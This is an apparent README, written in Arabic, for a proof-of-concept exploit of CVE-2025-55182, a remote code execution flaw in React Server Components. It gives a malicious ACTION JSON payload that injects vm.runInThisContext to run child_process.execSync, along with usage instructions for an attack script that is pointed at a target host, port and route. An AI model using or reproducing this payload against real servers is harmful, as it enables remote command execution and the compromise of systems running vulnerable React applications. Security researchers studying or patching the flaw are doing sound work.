
إثبات مفهوم لثغرة CVE-2025-55182، يوضح تنفيذ تعليمات برمجية عن بعد في مكونات خادم React عبر حمولات ACTION ضارة وحقن vm.runInThisContext.
هذا المشروع هو إثبات المفهوم لـ CVE-2025-55182 - React Server Components (RSC) RCE، ويوضح أنه في ظل ظروف معينة يمكن تشغيل تنفيذ الأوامر عن بُعد عبر vm.runInThisContext مع ACTION payload الخبيثة.
تحميل ACTION الخاص بـ React Server Components في ظل ظروف معينة سيكون:
يمكن للمهاجم إنشاء التحميل التالي:
{
"$ACTION_REF_0": "",
"$ACTION_0:0": "{\"id\": \"vm#runInThisContext\", \"bound\": [\"global.process.mainModule.require('child_process').execSync('calc').toString()\"]}"
}
| المعامل | إلزامي؟ | القيمة الافتراضية | الوصف |
|---|---|---|---|
--host | نعم | لا يوجد | عنوان IP أو اسم المجال للخادم الهدف. مثال: 127.0.0.1، 192.168.1.10، example.com |
--port | لا | 80 | منفذ خدمة HTTP الهدف، مثال: 3003 |
--path | نعم | لا يوجد | مسار التوجيه الذي يمكن أن يؤدي إلى الثغرة، مثال: /feedback، /action |
--https | لا | False | هل يتم استخدام HTTPS لإرسال التحميل (افتراضيًا HTTP) |
python a.py --host <IP_الهدف> --port <المنفذ> --path <مسار_URL_الهدف>
python a.py --host 127.0.0.1 --port 3003 --path /feedback